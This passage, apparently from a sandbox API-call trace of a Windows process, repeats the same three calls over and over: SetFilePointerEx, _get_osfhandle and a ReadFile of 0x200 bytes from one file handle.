liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.956] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.957] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 